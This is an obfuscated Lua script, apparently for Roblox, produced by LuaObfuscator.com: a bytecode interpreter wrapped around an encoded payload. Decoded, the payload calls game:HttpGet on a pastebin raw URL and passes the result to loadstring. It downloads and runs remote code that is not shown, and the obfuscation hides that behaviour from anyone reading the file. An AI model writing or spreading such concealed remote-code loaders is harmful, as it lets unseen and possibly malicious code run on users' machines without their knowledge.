--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v101=v5(v83,v19);v19=nil;return v101;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=0;local v85;while true do if (v84==((0 -0) -(117 -(32 + 85)))) then v85=(v31/((879 -(277 + 5 + 132 + 463))^(v32-(2 -(958 -(892 + 65))))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v85-(v85%1) ;end end else local v86=0;local v87;while true do if (v86==(931 -(857 + 74))) then v87=(570 -(367 + (479 -278)))^(v32-(928 -(214 + 713))) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (1270 -(226 + (1929 -885))) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==(351 -(87 + 263))) then return (v37 * (436 -((1064 -(915 + 82)) + 113))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (5 -3) );v18=v18 + (3 -1) ;v35=1 + 0 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (8 -5) );v18=v18 + 3 + 1 ;return (v41 * 16777216) + (v40 * (86188 -20652)) + (v39 * (1443 -(1069 + (267 -149)))) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 -1)) then v47=v20(v44,4 + 0 + 17 ,31);v48=((v20(v44,56 -24 )==(1 + 0)) and  -(792 -(368 + 423))) or (3 -(703 -(376 + 325))) ;v42=(34 -13) -(10 + 8) ;end if (v42==(1 + 2)) then if (v47==(0 -0)) then if (v46==(442 -(416 + 26))) then return v48 * (0 -0) ;else v47=1 + 0 ;v45=(3216 -1793) -(630 + 793) ;end elseif (v47==(3621 -1574)) then return ((v46==(0 -0)) and (v48 * ((439 -(145 + 293))/(430 -(44 + 386))))) or (v48 * NaN) ;end return v8(v48,v47-(2509 -(998 + (1901 -(447 + 966)))) ) * (v45 + (v46/((1749 -(760 + 987))^((52 -35) + 35)))) ;end if (v42==(767 -(745 + 21))) then v45=1 + 0 + 0 ;v46=(v20(v44,2 -1 ,792 -(201 + (1563 -992)) ) * (((2957 -(1703 + 114)) -(116 + 1022))^(133 -101))) + v43 ;v42=(4 -2) + 0 ;end if ((0 -0)==v42) then v43=v23();v44=v23();v42=3 -2 ;end end end local function v25(v49) local v50=14 -((31 -22) + (7 -2)) ;local v51;local v52;while true do if (v50==(379 -(85 + 291))) then return v6(v52);end if (v50==(1266 -(243 + 1022))) then v51=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;v50=2;end if ((0 + 0)==v50) then v51=nil;if  not v49 then v49=v23();if (v49==((162 + 1018) -(1123 + 57))) then return "";end end v50=1 + 0 ;end if ((256 -(163 + (124 -33)))==v50) then v52={};for v90=1931 -(1869 + 61) , #v51 do v52[v90]=v2(v1(v3(v51,v90,v90)));end v50=1 + 2 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 + 0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 560 -(306 + 254) ;end)();while true do if (v66~=(0 + 0)) then else if (v53~= #"<") then else local v98=(function() return 0 -0 ;end)();local v99=(function() return;end)();while true do if (v98==(1467 -(899 + 568))) then v99=(function() return 0 + 0 ;end)();while true do if (v99==1) then for v118= #"/",v58 do local v119=(function() return 0;end)();local v120=(function() return;end)();local v121=(function() return;end)();while true do if (v119==1) then if (v120== #":") then v121=(function() return v21()~=(0 -0) ;end)();elseif (v120==2) then v121=(function() return v24();end)();elseif (v120== #"91(") then v121=(function() return v25();end)();end v59[v118]=(function() return v121;end)();break;end if (v119~=0) then else local v157=(function() return 0;end)();while true do if (v157~=(603 -(268 + 335))) then else v120=(function() return v21();end)();v121=(function() return nil;end)();v157=(function() return 1;end)();end if (v157==(291 -(60 + 230))) then v119=(function() return 573 -(426 + 146) ;end)();break;end end end end end v57[ #"-19"]=(function() return v21();end)();v99=(function() return 1 + 1 ;end)();end if (v99==2) then v53=(function() return 2;end)();break;end if (v99~=(1456 -(282 + 1174))) then else v58=(function() return v23();end)();v59=(function() return {};end)();v99=(function() return 812 -(569 + 242) ;end)();end end break;end end end if (0==v53) then local v100=(function() return 0 -0 ;end)();while true do if (v100==(0 + 0)) then v54=(function() return {};end)();v55=(function() return {};end)();v100=(function() return 1025 -(706 + 318) ;end)();end if ((1252 -(721 + 530))==v100) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v100=(function() return 2;end)();end if (v100~=(1273 -(945 + 326))) then else v53=(function() return  #":";end)();break;end end end v66=(function() return 1;end)();end if (v66~=(2 -1)) then else if ((2 + 0)==v53) then for v102= #"}",v23() do local v103=(function() return 700 -(271 + 429) ;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if (v103~=(1 + 0)) then else while true do if (v104==(1500 -(1408 + 92))) then v105=(function() return v21();end)();if (v20(v105, #"]", #"!")~=(1086 -(461 + 625))) then else local v150=(function() return 1288 -(993 + 295) ;end)();local v151=(function() return;end)();local v152=(function() return;end)();local v153=(function() return;end)();while true do if (v150~=3) then else if (v20(v152, #"asd", #"91(")== #":") then v153[ #"xnxx"]=(function() return v59[v153[ #"xnxx"]];end)();end v54[v102]=(function() return v153;end)();break;end if (v150==2) then if (v20(v152, #"}", #"{")== #".") then v153[2]=(function() return v59[v153[2]];end)();end if (v20(v152,1 + 1 ,2)~= #"{") then else v153[ #"91("]=(function() return v59[v153[ #"nil"]];end)();end v150=(function() return 3;end)();end if (v150==0) then v151=(function() return v20(v105,1173 -(418 + 753) , #"asd");end)();v152=(function() return v20(v105, #"http",3 + 3 );end)();v150=(function() return 1;end)();end if (v150~=(1 + 0)) then else local v165=(function() return 0;end)();while true do if (v165==0) then v153=(function() return {v22(),v22(),nil,nil};end)();if (v151==0) then local v171=(function() return 0 + 0 ;end)();local v172=(function() return;end)();while true do if ((529 -(406 + 123))==v171) then v172=(function() return 0;end)();while true do if (0==v172) then v153[ #"gha"]=(function() return v22();end)();v153[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v151== #"~") then v153[ #"19("]=(function() return v23();end)();elseif (v151==(1771 -(1749 + 20))) then v153[ #"gha"]=(function() return v23() -(2^16) ;end)();elseif (v151== #"asd") then local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177==(0 + 0)) then v178=(function() return 0;end)();while true do if (v178==(1322 -(1249 + 73))) then v153[ #"asd"]=(function() return v23() -(2^(6 + 10)) ;end)();v153[ #".dev"]=(function() return v22();end)();break;end end break;end end end v165=(function() return 1146 -(466 + 679) ;end)();end if ((2 -1)~=v165) then else v150=(function() return 5 -3 ;end)();break;end end end end end break;end end break;end if (v103==(1900 -(106 + 1794))) then local v108=(function() return 0 + 0 ;end)();while true do if (v108~=(0 + 0)) then else v104=(function() return 0 -0 ;end)();v105=(function() return nil;end)();v108=(function() return 2 -1 ;end)();end if (v108~=(115 -(4 + 110))) then else v103=(function() return 585 -(57 + 527) ;end)();break;end end end end end for v106= #"}",v23() do v55[v106-#"!" ]=(function() return v28();end)();end return v57;end break;end end end end local function v29(v60,v61,v62) local v63=v60[(3403 -(1913 + 62)) -(41 + 1386) ];local v64=v60[(67 + 38) -(17 + 86) ];local v65=v60[3 + 0 ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=1 -(0 -0) ;local v72= -(2 -1);local v73={};local v74={...};local v75=v12("#",...) -(1 -0) ;local v76={};local v77={};for v88=0 -0 ,v75 do if (v88>=v69) then v73[v88-v69 ]=v74[v88 + 1 + 0 ];else v77[v88]=v74[v88 + 1 + 0 ];end end local v78=(v75-v69) + (1 -0) ;local v79;local v80;while true do local v89=65 -(30 + (92 -57)) ;while true do if (v89==(1 + 0)) then if ((v80<=(1263 -(1043 + 214))) or (516>3434)) then if (v80<=(7 -5)) then if (v80<=(1212 -(323 + 889))) then local v109=0;local v110;local v111;while true do if ((4046>=3033) and (v109==(0 -0))) then v110=v79[2];v111=v77[v79[(2516 -(565 + 1368)) -(361 + 219) ]];v109=(608 -287) -(53 + 267) ;end if ((v109==(1 + 0)) or (2719<=1447)) then v77[v110 + 1 ]=v111;v77[v110]=v111[v79[417 -((56 -41) + 398) ]];break;end end elseif (v80==(983 -(18 + 964))) then local v122=0 -0 ;local v123;while true do if (v122==(0 + 0)) then v123=v79[2 + 0 ];v77[v123]=v77[v123](v13(v77,v123 + ((1089 -(64 + 174)) -(20 + 119 + 711)) ,v72));break;end end else v77[v79[2 + 0 ]]=v62[v79[(1790 -(1477 + 184)) -(116 + 10) ]];end elseif (v80<=4) then if (v80>3) then v77[v79[2 -0 ]]=v79[1 + 2 ];else v77[v79[740 -(542 + 196) ]]();end elseif (v80==((13 -3) -(341 -(144 + 192)))) then local v128=v79[1 + 1 ];v77[v128]=v77[v128](v13(v77,v128 + 1 + 0 ,v72));else v77[v79[1 + 1 ]]=v62[v79[7 -4 ]];end elseif ((v80<=((238 -(42 + 174)) -13)) or (4134<3926)) then if ((v80<=7) or (164>=2785)) then local v112=(1166 + 385) -(1126 + 353 + 72) ;local v113;local v114;local v115;local v116;while true do if (v112==(2 + 0)) then for v154=v113,v72 do local v155=405 -((974 -(564 + 292)) + 287) ;while true do if (v155==(0 -0)) then v116=v116 + (1122 -((203 -85) + 1003)) ;v77[v154]=v114[v116];break;end end end break;end if (v112==(2 -(2 -1))) then v72=(v115 + v113) -1 ;v116=0;v112=379 -((446 -(244 + 60)) + 235) ;end if (v112==(0 + 0)) then v113=v79[9 -7 ];v114,v115=v70(v77[v113](v13(v77,v113 + (1505 -(363 + 1141)) + 0 + 0 ,v79[(1456 -(41 + 435)) -(553 + 424) ])));v112=(1581 -(1183 + 397)) -(1001 -(938 + 63)) ;end end elseif (v80==8) then local v132=v79[2 + 0 ];local v133=v77[v79[3]];v77[v132 + 1 ]=v133;v77[v132]=v133[v79[4 + 0 ]];else v77[v79[(5 -3) + 0 ]]=v79[2 + 0 + 1 ];end elseif (v80<=(7 + 4)) then if ((v80>(21 -11)) or (525==2109)) then do return;end else do return;end end elseif ((33==33) and (v80==12)) then local v139=0;local v140;local v141;local v142;local v143;while true do if (v139==(2 -1)) then v72=(v142 + v140) -(2 -1) ;v143=0;v139=1 + 1 ;end if (v139==(9 -7)) then for v161=v140,v72 do v143=v143 + (754 -(239 + 514)) ;v77[v161]=v141[v143];end break;end if (v139==(0 + 0)) then v140=v79[1331 -(797 + 398 + 134) ];v141,v142=v70(v77[v140](v13(v77,v140 + 1 + 0 ,v79[2 + 1 ])));v139=2 -1 ;end end else v77[v79[1204 -(373 + 829) ]]();end v71=v71 + ((241 + 491) -(476 + 255)) ;break;end if (v89==(1130 -(369 + 761))) then v79=v67[v71];v80=v79[1];v89=(1614 -(1565 + 48)) + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F70484330366A446200083O0012023O00013O001202000100023O00202O000100010003001209000300044O000C000100034O00015O00022O00033O000100012O000A3O00017O00",v9(),...);
